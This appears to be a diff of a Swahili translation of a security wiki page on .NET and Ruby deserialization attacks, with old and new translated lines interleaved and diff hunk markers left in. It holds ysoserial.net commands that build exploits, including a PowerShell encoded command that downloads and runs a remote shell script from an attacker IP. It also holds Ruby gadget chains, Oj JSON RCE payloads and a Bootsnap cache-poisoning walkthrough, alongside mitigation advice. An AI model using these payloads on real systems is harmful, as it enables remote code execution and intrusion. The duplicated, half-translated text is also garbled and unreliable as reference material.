Ikiwa unataka kujifunza kuhusu **jinsi ysoserial.net inavyounda exploit zake** unaweza [**kuangalia ukurasa huu ambapo inafafanuliwa gadget ya ObjectDataProvider + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).
Ikiwa unataka kujifunza kuhusu **jinsi ysoserial.net inavyounda exploit zake** unaweza [**kuangalia ukurasa huu unaoelezea ObjectDataProvider gadget + ExpandedWrapper + Json.Net formatter**](basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md).
Chaguzi kuu za **ysoserial.net** ni: **`--gadget`**, **`--formatter`**, **`--output`** na **`--plugin`.**
Chaguo kuu za **ysoserial.net** ni: **`--gadget`**, **`--formatter`**, **`--output`** na **`--plugin`.**
- **`--gadget`** inatumika kuashiria gadget ya kutumia (onyesha darasa/funzo ambalo litakabiliwa wakati wa deserialization ili kutekeleza amri).
- **`--formatter`**, inatumika kuashiria njia ya kuhifadhi exploit (unahitaji kujua ni maktaba gani inayotumiwa na nyuma ili kusafirisha payload na utumie ile ile kuhifadhi).
- **`--output`** inatumika kuashiria ikiwa unataka exploit katika **raw** au **base64** iliyokodishwa. _Kumbuka kwamba **ysoserial.net** itakuwa **inakodisha** payload kwa kutumia **UTF-16LE** (kodishaji inayotumiwa kwa kawaida kwenye Windows) hivyo ikiwa unapata raw na unakodisha tu kutoka kwenye console ya linux unaweza kuwa na baadhi ya **matatizo ya ulinganifu wa kodishaji** ambayo yatakuzuia exploit kufanya kazi vizuri (katika sanduku la HTB JSON payload ilifanya kazi katika UTF-16LE na ASCII lakini hii haimaanishi itafanya kazi kila wakati)._
- **`--plugin`** ysoserial.net inasaidia plugins kutengeneza **exploits kwa mifumo maalum** kama ViewState
- **`--gadget`** inatumika kuonyesha gadget ya ku-abuse (onyesha class/function itakayotumiwa wakati wa deserialization ili kuendesha commands).
- **`--formatter`**, inatumika kuonyesha njia ya serializing exploit (unahitaji kujua ni library gani backend inatumia ku-deserialize payload na kutumia ile ile kuserialize)
- **`--output`** inatumika kuonyesha ikiwa unataka exploit katika **raw** au **base64** encoded. _Kumbuka kwamba **ysoserial.net** itafanya **encode** payload kwa kutumia **UTF-16LE** (encoding inayotumika kwa default kwenye Windows) hivyo ukipata raw na ukai-encode kutoka kwenye console ya linux unaweza kupata matatizo ya **encoding compatibility** ambayo yatazuia exploit ifanye kazi sawasawa (katika HTB JSON box payload ilifanya kazi kwa zote UTF-16LE na ASCII lakini hii haisemi itafanya kazi kila wakati)._
- **`--plugin`** ysoserial.net inaunga mkono plugins za kutengeneza **exploits kwa frameworks maalumu** kama ViewState
#### Parameta zaidi za ysoserial.net
#### More ysoserial.net parameters
- `--minify` itatoa **payload ndogo** (ikiwa inawezekana)
- `--raf -f Json.Net -c "chochote"` Hii itaonyesha gadgets zote zinazoweza kutumika na formatter iliyotolewa (`Json.Net` katika kesi hii)
- `--sf xml` unaweza **kuonyesha gadget** (`-g`) na ysoserial.net itatafuta formatters zinazojumuisha "xml" (bila kujali herufi)
- `--minify` itatoa **payload ndogo zaidi** (iwapo inawezekana)
- `--raf -f Json.Net -c "anything"` Hii itaonyesha gadgets zote zinazoweza kutumika na formatter iliyotolewa (`Json.Net` katika mfano huu)
- `--sf xml` unaweza **kuonyesha gadget** (`-g`) na ysoserial.net itatafuta formatters zinazojumuisha "xml" (case insensitive)
**Mifano ya ysoserial** ya kuunda exploits:
**ysoserial examples** to create exploits:
```bash
#Send ping
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
@ -734,9 +748,9 @@ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.
#Create exploit using the created B64 shellcode
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
```
**ysoserial.net** ina **kipengele cha kuvutia sana** ambacho husaidia kuelewa vizuri jinsi kila exploit inavyofanya kazi: `--test`\
Ikiwa utaashiria kipengele hiki **ysoserial.net** itajaribu **exploit kwa ndani,** hivyo unaweza kujaribu kama payload yako itafanya kazi ipasavyo.\
Kipengele hiki ni muhimu kwa sababu ukikagua msimbo utaona vipande vya msimbo kama ifuatavyo (kutoka [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)):
**ysoserial.net** pia ina **parameter yenye kuvutia sana** ambayo husaidia kuelewa vizuri jinsi kila exploit inavyofanya kazi: `--test`\
Ukiashiria parameter hii **ysoserial.net** itajaribu **exploit** kikaboni, hivyo unaweza kujaribu kama payload yako itafanya kazi ipasavyo.\
Parameter hii ni ya msaada kwa sababu ukiangalia msimbo utapata vipande vya msimbo kama vifuatavyo (kutoka [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)):
```java
if (inputArgs.Test)
{
@ -750,7 +764,7 @@ Debugging.ShowErrors(inputArgs, err);
}
}
```
Hii inamaanisha kwamba ili kujaribu exploit, msimbo utaita [serializersHelper.JsonNet_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539)
Hii ina maana kwamba ili kujaribu exploit, code itaitisha [serializersHelper.JsonNet_deserialize](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Helpers/SerializersHelper.cs#L539)
```java
public static object JsonNet_deserialize(string str)
{
@ -761,46 +775,46 @@ TypeNameHandling = TypeNameHandling.Auto
return obj;
}
```
Katika **kodi ya awali ina udhaifu kwa exploit iliyoundwa**. Hivyo basi, ikiwa unapata kitu kinachofanana katika programu ya .Net, inamaanisha kwamba labda programu hiyo ina udhaifu pia.\
Kwa hiyo, **`--test`** parameter inatupa uwezo wa kuelewa **ni vipande vipi vya kodi vinavyoweza kuathiriwa** na exploit ya deserialization ambayo **ysoserial.net** inaweza kuunda.
Katika **previous code is vulnerable to the exploit created**. Kwa hivyo ikiwa utapata kitu kinachofanana katika application ya .Net ina maana kwamba huenda application hiyo pia iko nyeti.\
Kwa hiyo parameter ya **`--test`** inatuwezesha kuelewa **ni sehemu gani za code zinazoathirika** na exploit ya desrialization ambayo **ysoserial.net** inaweza kuunda.
### ViewState
Angalia [hii POST kuhusu **jinsi ya kujaribu ku exploit parameter ya \_\_ViewState ya .Net**](exploiting-__viewstate-parameter.md) ili **kutekeleza kodi isiyo na mipaka.** Ikiwa **tayari unajua siri** zinazotumiwa na mashine ya mwathirika, [**soma hii post kujua jinsi ya kutekeleza kodi**](exploiting-__viewstate-knowing-the-secret.md)**.**
Angalia [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-__viewstate-parameter.md) to **execute arbitrary code.** Ikiwa **tayari unajua the secrets** zinazotumika kwenye mashine ya mwathiriwa, [**read this post to know to execute code**](exploiting-__viewstate-knowing-the-secret.md)**.**
### Kuzuia
Ili kupunguza hatari zinazohusiana na deserialization katika .Net:
- **Epuka kuruhusu mizunguko ya data kufafanua aina zao za vitu.** Tumia `DataContractSerializer` au `XmlSerializer` inapowezekana.
- **Kwa `JSON.Net`, weka `TypeNameHandling` kuwa `None`:** `TypeNameHandling = TypeNameHandling.None`
- **Epuka kutumia `JavaScriptSerializer` na `JavaScriptTypeResolver`.**
- **Punguza aina ambazo zinaweza ku deserialized**, ukielewa hatari zinazohusiana na aina za .Net, kama `System.IO.FileInfo`, ambayo inaweza kubadilisha mali za faili za seva, na hivyo kusababisha mashambulizi ya kukatiza huduma.
- **Kuwa makini na aina zenye mali hatari**, kama `System.ComponentModel.DataAnnotations.ValidationException` yenye mali yake ya `Value`, ambayo inaweza kutumika vibaya.
- **Dhibiti kwa usalama uundaji wa aina** ili kuzuia washambuliaji kuathiri mchakato wa deserialization, na kufanya hata `DataContractSerializer` au `XmlSerializer` kuwa na udhaifu.
- **Tekeleza udhibiti wa orodha nyeupe** kwa kutumia `SerializationBinder` maalum kwa `BinaryFormatter` na `JSON.Net`.
- **Kuwa na habari kuhusu gadgets za deserialization zisizo salama zinazojulikana** ndani ya .Net na kuhakikisha deserializers hazianzishi aina kama hizo.
- **Tenga kodi inayoweza kuwa hatari** kutoka kwa kodi yenye ufikiaji wa mtandao ili kuepuka kufichua gadgets zinazojulikana, kama `System.Windows.Data.ObjectDataProvider` katika programu za WPF, kwa vyanzo vya data visivyoaminika.
- **Avoid allowing data streams to define their object types.** Tumia `DataContractSerializer` au `XmlSerializer` inapowezekana.
- **For `JSON.Net`, set `TypeNameHandling` to `None`:** `TypeNameHandling = TypeNameHandling.None`
- **Avoid using `JavaScriptSerializer` with a `JavaScriptTypeResolver`.**
- **Limit the types that can be deserialized**, ukielewa hatari zilizopo kwa aina za .Net, kama `System.IO.FileInfo`, ambazo zinaweza kubadilisha properties za files za server, potentially leading to denial of service attacks.
- **Be cautious with types having risky properties**, kama `System.ComponentModel.DataAnnotations.ValidationException` na property yake ya `Value`, ambayo inaweza kutumiwa.
- **Securely control type instantiation** ili kuzuia attackers kuathiri mchakato wa deserialization, jambo linaloweza kufanya hata `DataContractSerializer` au `XmlSerializer` kuwa nyeti.
- **Implement white list controls** kwa kutumia custom `SerializationBinder` kwa `BinaryFormatter` na `JSON.Net`.
- **Stay informed about known insecure deserialization gadgets** ndani ya .Net na hakikisha deserializers hazitaundaji aina hizo.
- **Isolate potentially risky code** kutoka kwa code inayopata internet ili kuepuka kuonyesha known gadgets, kama `System.Windows.Data.ObjectDataProvider` katika WPF applications, kwa vyanzo vya data visivyoaminika.
### **Marejeo**
### **Marejeleo**
- Karatasi ya deserialization ya Java na .Net **: [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** mazungumzo: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) na slaidi: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
- Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
- [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp)
- [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
- [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
## **Ruby**
Katika Ruby, serialization inarahisishwa na mbinu mbili ndani ya maktaba ya **marshal**. Mbinu ya kwanza, inayojulikana kama **dump**, inatumika kubadilisha kitu kuwa mzunguko wa byte. Mchakato huu unajulikana kama serialization. Kinyume chake, mbinu ya pili, **load**, inatumika kurudisha mzunguko wa byte kuwa kitu, mchakato unaojulikana kama deserialization.
Katika Ruby, serialization inafanyika kupitia njia mbili ndani ya library ya **marshal**. Njia ya kwanza, inayojulikana kama **dump**, hutumika kubadilisha object kuwa byte stream. Mchakato huu unaitwa serialization. Kwa upande mwingine, njia ya pili, **load**, hutumika kurejesha byte stream tena kuwa object, mchakato unaojulikana kama deserialization.
Ili kulinda vitu vilivyopangwa, **Ruby inatumia HMAC (Hash-Based Message Authentication Code)**, kuhakikisha uadilifu na ukweli wa data. Funguo inayotumika kwa kusudi hili inahifadhiwa katika moja ya maeneo kadhaa yanay posible:
Kwa kuhakikisha usalama wa serialized objects, **Ruby inatumia HMAC (Hash-Based Message Authentication Code)**, kuhakikisha uadilifu na uhalali wa data. Key inayotumika kwa madhumuni haya imehifadhiwa katika mojawapo ya maeneo yafuatayo:
- `config/environment.rb`
- `config/initializers/secret_token.rb`
- `config/secrets.yml`
- `/proc/self/environ`
**Ruby 2.X generic deserialization to RCE gadget chain (maelezo zaidi katika** [**https://www.elttam.com/blog/ruby-deserialization/**](https://www.elttam.com/blog/ruby-deserialization/)**)**:
**Ruby 2.X generic deserialization to RCE gadget chain (more info in** [**https://www.elttam.com/blog/ruby-deserialization/**](https://www.elttam.com/blog/ruby-deserialization/)**)**:
```ruby
#!/usr/bin/env ruby
@ -871,18 +885,18 @@ require "base64"
puts "Payload (Base64 encoded):"
puts Base64.encode64(payload)
```
Mnyororo mwingine wa RCE kutumia Ruby On Rails: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
Mnyororo mwingine wa RCE to exploit Ruby On Rails: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
### Mbinu ya Ruby .send()
### Ruby .send() method
Kama ilivyoelezwa katika [**ripoti hii ya udhaifu**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/), ikiwa ingizo la mtumiaji lisilo safishwa linafikia mbinu ya `.send()` ya kitu cha ruby, mbinu hii inaruhusu **kuita mbinu nyingine yoyote** ya kitu hicho kwa kutumia vigezo vyovyote.
Kama ilivyoelezwa katika [**this vulnerability report**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/), endapo input isiyo sanitized kutoka kwa mtumiaji itafika kwenye `.send()` method ya ruby object, method hii inaruhusu **kuita method nyingine yoyote** ya object kwa parameters yoyote.
Kwa mfano, kuita eval na kisha msimbo wa ruby kama parameter ya pili kutaruhusu kutekeleza msimbo wa kiholela:
Kwa mfano, kuitisha eval kisha kuweka ruby code kama parameter ya pili kutaruhusu kuendesha msimbo wowote:
```ruby
<Object>.send('eval', '<user input with Ruby code>') == RCE
```
Zaidi ya hayo, ikiwa tu parameter moja ya **`.send()`** inasimamiwa na mshambuliaji, kama ilivyotajwa katika andiko la awali, inawezekana kuita njia yoyote ya kitu ambacho **hakihitaji hoja** au ambazo hoja zake zina **thamani za chaguo-msingi**.\
Kwa hili, inawezekana kuhesabu njia zote za kitu ili **kupata baadhi ya njia za kuvutia ambazo zinakidhi mahitaji hayo**.
Zaidi ya hayo, ikiwa kigezo kimoja tu cha **`.send()`** kinadhibitiwa na attacker, kama ilivyotajwa kwenye writeup ya awali, inawezekana kuita method yoyote ya object ambayo **haitahitaji vigezo** au ambayo vigezo vyake vina **thamani za chaguo-msingi**.\
Kwa hili, inawezekana kuorodhesha methods zote za object ili **kupata baadhi ya methods zinazovutia ambazo zinakidhi mahitaji hayo**.
```ruby
<Object>.send('<user_input>')
@ -906,23 +920,23 @@ candidate_methods.length() # Final number of methods=> 3595
```
### Ruby class pollution
Angalia jinsi inaweza kuwa inawezekana [kuchafua darasa la Ruby na kulitumia hapa](ruby-class-pollution.md).
Angalia jinsi inavyoweza [pollute a Ruby class and abuse it in here](ruby-class-pollution.md).
### Ruby _json pollution
Wakati wa kutuma mwili baadhi ya thamani zisizoweza kuhesabiwa kama array zitaongezwa kwenye ufunguo mpya unaoitwa `_json`. Hata hivyo, inawezekana kwa mshambuliaji pia kuweka katika mwili thamani inayoitwa `_json` yenye thamani za kiholela anazotaka. Kisha, ikiwa backend kwa mfano inakagua ukweli wa parameter lakini pia inatumia parameter `_json` kufanya kitendo fulani, inaweza kufanyika kupita idhini.
Unapotuma kwenye body baadhi ya thamani ambazo si hashable kama array, zinaongezwa kwenye key mpya iitwayo `_json`. Hata hivyo, mdukuzi anaweza pia kuweka kwenye body thamani inayoitwa `_json` yenye vitu vyovyote anavyotaka. Kisha, kwa mfano ikiwa backend inakagua uhalali wa parameter lakini pia inatumia parameter `_json` kutekeleza kitendo fulani, kunaweza kufanywa authorisation bypass.
Angalia maelezo zaidi katika [ukurasa wa Ruby _json pollution](ruby-_json-pollution.md).
Angalia taarifa zaidi kwenye [Ruby _json pollution page](ruby-_json-pollution.md).
### Other libraries
Teknolojia hii ilichukuliwa [**kutoka kwenye chapisho hili la blog**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared).
Teknika hii ilichukuliwa[ **from this blog post**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared).
Kuna maktaba nyingine za Ruby ambazo zinaweza kutumika kuunda vitu na hivyo zinaweza kutumika vibaya kupata RCE wakati wa deserialization isiyo salama. Jedwali lifuatalo linaonyesha baadhi ya maktaba hizi na njia wanayoita ya maktaba iliyopakiwa kila wakati inapotolewa (kazi ya kutumia vibaya ili kupata RCE kimsingi):
Kuna maktaba nyingine za Ruby zinazoweza kutumika ku-serialize objects na kwa hivyo zinaweza kutumiwa vibaya kupata RCE wakati wa insecure deserialization. Jedwali lifuatalo linaonyesha baadhi ya maktaba hizi na methodi wanayoiita ya library iliyopakiwa kila inapouserialize (kazi inayoweza kutumiwa ili kupata RCE):
<table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>Library</strong></td><td><strong>Input data</strong></td><td><strong>Kick-off method inside class</strong></td></tr><tr><td>Marshal (Ruby)</td><td>Binary</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code> (class needs to be put into hash(map) as key)</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code> (class needs to be put into hash(map) as key)</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code> (class needs to be put into hash(map) as key)<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code> ([see notes regarding json_create at end](#table-vulnerable-sinks))</td></tr></tbody></table>
<table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>Maktaba</strong></td><td><strong>Data ya input</strong></td><td><strong>Methodi inayochochea ndani ya class</strong></td></tr><tr><td>Marshal (Ruby)</td><td>Binary</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code> (class needs to be put into hash(map) as key)</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code> (class needs to be put into hash(map) as key)</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code> (class needs to be put into hash(map) as key)<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code> ([see notes regarding json_create at end](#table-vulnerable-sinks))</td></tr></tbody></table>
Basic example:
Mfano wa msingi:
```ruby
# Existing Ruby class inside the code of the app
class SimpleClass
@ -944,7 +958,7 @@ puts json_payload
# Sink vulnerable inside the code accepting user input as json_payload
Oj.load(json_payload)
```
Katika kesi ya kujaribu kutumia Oj, ilikuwaje kupata darasa la gadget ambalo ndani ya kazi yake ya `hash` litaita `to_s`, ambayo itaita spec, ambayo itaita fetch_path ambayo ilikuwaje kuifanya ipate URL ya nasibu, ikitoa detector bora wa aina hizi za udhaifu wa deserialization zisizo na usafi.
Katika kesi ya kujaribu kutumia vibaya Oj, ilikuwa inawezekana kupata gadget class ambayo ndani ya `hash` function yake itaita `to_s`, ambayo itaita spec, ambayo itaita fetch_path, ambayo iliwwezekana kuifanya itafute URL ya nasibu, ikitoa detector mzuri wa aina hizi za unsanitized deserialization vulnerabilities.
```json
{
"^o": "URI::HTTP",
@ -956,7 +970,7 @@ Katika kesi ya kujaribu kutumia Oj, ilikuwaje kupata darasa la gadget ambalo nda
"password": "anypw"
}
```
Zaidi ya hayo, iligundulika kwamba kwa mbinu ya awali folda pia inaundwa katika mfumo, ambayo ni hitaji la kutumia gadget nyingine ili kubadilisha hii kuwa RCE kamili na kitu kama:
Zaidi ya hayo, iligundulika kwamba kwa kutumia tekniki iliyotangulia, kabrasha pia linaundwa kwenye mfumo — jambo ambalo ni sharti ili kutumia gadget nyingine kwa lengo la kubadilisha hili kuwa RCE kamili kwa kitu kama:
```json
{
"^o": "Gem::Resolver::SpecSpecification",
@ -978,47 +992,51 @@ Zaidi ya hayo, iligundulika kwamba kwa mbinu ya awali folda pia inaundwa katika
}
}
```
Check for more details in the [**original post**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared).
Angalia kwa maelezo zaidi kwenye [**original post**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared).
### Bootstrap Caching
Sio kweli udhaifu wa deserialization lakini ni hila nzuri ya kutumia bootstrap caching ili kupata RCE kutoka kwa programu ya rails kwa kuandika faili bila mpangilio (pata [post ya asili hapa](https://blog.convisoappsec.com/en/from-arbitrary-file-write-to-rce-in-restricted-rails-apps/)).
Not really a desearilization vuln but a nice trick to abuse bootstrap caching to to get RCE from a rails application with an arbitrary file write (find the complete [original post in here](https://blog.convisoappsec.com/en/from-arbitrary-file-write-to-rce-in-restricted-rails-apps/)).
Hapa kuna muhtasari mfupi wa hatua zilizofafanuliwa katika makala ya kutumia udhaifu wa kuandika faili bila mpangilio kwa kutumia Bootsnap caching:
Hapa chini ni muhtasari mfupi wa hatua zilizoelezewa katika makala kwa ajili ya kutumia arbitrary file write vulnerability kwa kutumia Bootsnap caching:
- Tambua Udhaifu na Mazingira
- Identify the Vulnerability and Environment
Kazi ya kupakia faili ya programu ya Rails inaruhusu mshambuliaji kuandika faili bila mpangilio. Ingawa programu inafanya kazi kwa vizuizi (directories fulani kama tmp zinaweza kuandikwa kutokana na mtumiaji asiye mzizi wa Docker), hii bado inaruhusu kuandika kwenye directory ya Bootsnap cache (kawaida chini ya tmp/cache/bootsnap).
Fomu ya uploads ya files ya Rails app inaruhusu attacker kuandika files kwa arbitrary. Ingawa app inakimbia chini ya vikwazo (tu directories fulani kama tmp zinaweza kuandikwa kutokana na Dockers non-root user), hii bado inaruhusu kuandika kwenye Bootsnap cache directory (kawaida chini ya tmp/cache/bootsnap).
- Elewa Mfumo wa Cache wa Bootsnap
- Understand Bootsnaps Cache Mechanism
Bootsnap inaboresha nyakati za kuanzisha Rails kwa kuhifadhi msimbo wa Ruby ulioandaliwa, YAML, na faili za JSON. Inahifadhi faili za cache ambazo zinajumuisha kichwa cha cache key (ikiwa na maeneo kama toleo la Ruby, saizi ya faili, mtime, chaguo za kuandaa, nk.) ikifuatiwa na msimbo ulioandaliwa. Kichwa hiki kinatumika kuthibitisha cache wakati wa kuanzisha programu.
Bootsnap huharakisha boot ya Rails kwa caching compiled Ruby code, YAML, na JSON files. Inahifadhi cache files ambazo zinajumuisha cache key header (zikiwa na fields kama RUBY_VERSION, file size, mtime, compile options, n.k.) ikifuatiwa na compiled code. Header hii hutumika kuthibitisha cache wakati wa app startup.
- Kusanya Metadata ya Faili
- Gather File Metadata
Mshambuliaji kwanza huchagua faili lengwa ambalo linaweza kupakiwa wakati wa kuanzisha Rails (kwa mfano, set.rb kutoka maktaba ya kawaida ya Ruby). Kwa kutekeleza msimbo wa Ruby ndani ya kontena, wanatoa metadata muhimu (kama RUBY_VERSION, RUBY_REVISION, saizi, mtime, na compile_option). Takwimu hii ni muhimu kwa kutengeneza cache key halali.
Attacker kwanza huchagua target file ambayo ina uwezekano wa kupakiwa wakati wa Rails startup (kwa mfano, set.rb kutoka kwa Rubys standard library). Kwa kutekeleza Ruby code ndani ya container, wanatoa metadata muhimu (kama RUBY_VERSION, RUBY_REVISION, size, mtime, na compile_option). Data hii ni muhimu kwa kutengeneza cache key halali.
- Hesabu Njia ya Faili ya Cache
- Compute the Cache File Path
Kwa kuiga mfumo wa hash wa FNV-1a 64-bit wa Bootsnap, njia sahihi ya faili ya cache inapatikana. Hatua hii inahakikisha kuwa faili ya cache yenye uharibifu imewekwa mahali ambapo Bootsnap inatarajia (kwa mfano, chini ya tmp/cache/bootsnap/compile-cache-iseq/).
Kwa kuiga Bootsnaps FNV-1a 64-bit hash mechanism, njia sahihi ya cache file inahesabiwa. Hatua hii inahakikisha kwamba malicious cache file imewekwa mahali ambako Bootsnap inatarajia (mfano, chini ya tmp/cache/bootsnap/compile-cache-iseq/).
- Tengeneza Faili ya Cache yenye Uharibifu
- Craft the Malicious Cache File
Mshambuliaji anajiandaa na payload ambayo:
Attacker huandaa payload ambayo:
- Inatekeleza amri zisizo na mpangilio (kwa mfano, kuendesha id kuonyesha habari za mchakato).
- Inafuta cache yenye uharibifu baada ya kutekelezwa ili kuzuia matumizi ya kurudi.
- Inapakia faili asilia (kwa mfano, set.rb) ili kuepuka kuangusha programu.
- Executes arbitrary commands (for example, running id to show process info).
- Removes the malicious cache after execution to prevent recursive exploitation.
- Loads the original file (e.g., set.rb) to avoid crashing the application.
Payload hii inakomilishwa kuwa binary Ruby code na kuunganishwa na cache key header iliyotengenezwa kwa uangalifu (kwa kutumia metadata zilizokusanywa awali na nambari sahihi ya version ya Bootsnap).
- Overwrite and Trigger Execution
Using the arbitrary file write vulnerability, attacker anaandika crafted cache file kwenye location iliyohesabiwa. Kisha wanaanzisha restart ya server (kwa kuandika kwenye tmp/restart.txt, ambayo inafuatiliwa na Puma). Wakati wa restart, wakati Rails inahitaji file lengwa, malicious cache file itapakiwa, na kusababisha remote code execution (RCE).
Payload hii inakusanywa kuwa msimbo wa Ruby wa binary na kuunganishwa na kichwa cha cache key kilichoundwa kwa uangalifu (kwa kutumia metadata iliyokusanywa awali na nambari sahihi ya toleo kwa Bootsnap).
- Badilisha na Kuanzisha Utendaji
Kwa kutumia udhaifu wa kuandika faili bila mpangilio, mshambuliaji anaandika faili ya cache iliyoundwa kwenye eneo lililohesabiwa. Kisha, wanazindua upya seva (kwa kuandika kwenye tmp/restart.txt, ambayo inafuatiliwa na Puma). Wakati wa upya, wakati Rails inahitaji faili lengwa, faili ya cache yenye uharibifu inapakuliwa, na kusababisha utekelezaji wa msimbo wa mbali (RCE).
### Ruby Marshal exploitation in practice (updated)
Treat any path where untrusted bytes reach `Marshal.load`/`marshal_load` as an RCE sink. Marshal reconstructs arbitrary object graphs and triggers library/gem callbacks during materialization.
- Minimal vulnerable Rails code path:
```ruby
class UserRestoreController < ApplicationController
@ -1033,20 +1051,20 @@ end
end
end
```
- Madarasa ya kawaida ya gadget zinazoonekana katika minyororo halisi: `Gem::SpecFetcher`, `Gem::Version`, `Gem::RequestSet::Lockfile`, `Gem::Resolver::GitSpecification`, `Gem::Source::Git`.
- Alama ya athari ya kawaida iliyowekwa ndani ya payloads (inasanidiwa wakati wa unmarshal):
- Aina za kawaida za gadget classes zinazojitokeza katika real chains: `Gem::SpecFetcher`, `Gem::Version`, `Gem::RequestSet::Lockfile`, `Gem::Resolver::GitSpecification`, `Gem::Source::Git`.
- Alama ya kawaida ya side-effect iliyowekwa ndani ya payloads (inayotekelezwa wakati wa unmarshal):
```
*-TmTT="$(id>/tmp/marshal-poc)"any.zip
```
Where it surfaces in real apps:
- Rails cache stores and session stores historically using Marshal
- Background job backends and file-backed object stores
- Any custom persistence or transport of binary object blobs
Inapoonekana katika maombi ya kweli:
- Rails cache stores na session stores ambazo kihistoria zimetumia Marshal
- Backends za background job na object stores zilizo kwenye faili
- Utunzaji wa desturi au usafirishaji wowote wa binary object blobs
Industrialized gadget discovery:
- Grep for constructors, `hash`, `_load`, `init_with`, or side-effectful methods invoked during unmarshal
- Use CodeQLs Ruby unsafe deserialization queries to trace sources → sinks and surface gadgets
- Validate with public multi-format PoCs (JSON/XML/YAML/Marshal)
Ugunduzi wa gadgets kwa kiwango cha viwandani:
- Tumia grep kutafuta constructors, `hash`, `_load`, `init_with`, au methods zenye side-effects zinazoitwa wakati wa unmarshal
- Tumia CodeQLs Ruby unsafe deserialization queries kufuatilia sources → sinks na kuonyesha gadgets
- Thibitisha kwa PoCs za hadharani zinazounga mkono miundo mingi (JSON/XML/YAML/Marshal)
## References
@ -1065,5 +1083,6 @@ Industrialized gadget discovery:
- Ruby 3.4.0-rc1 release: https://github.com/ruby/ruby/releases/tag/v3_4_0_rc1
- Ruby fix PR #12444: https://github.com/ruby/ruby/pull/12444
- Trail of Bits Auditing RubyGems.org (Marshal findings): https://blog.trailofbits.com/2024/12/11/auditing-the-ruby-ecosystems-central-package-repository/
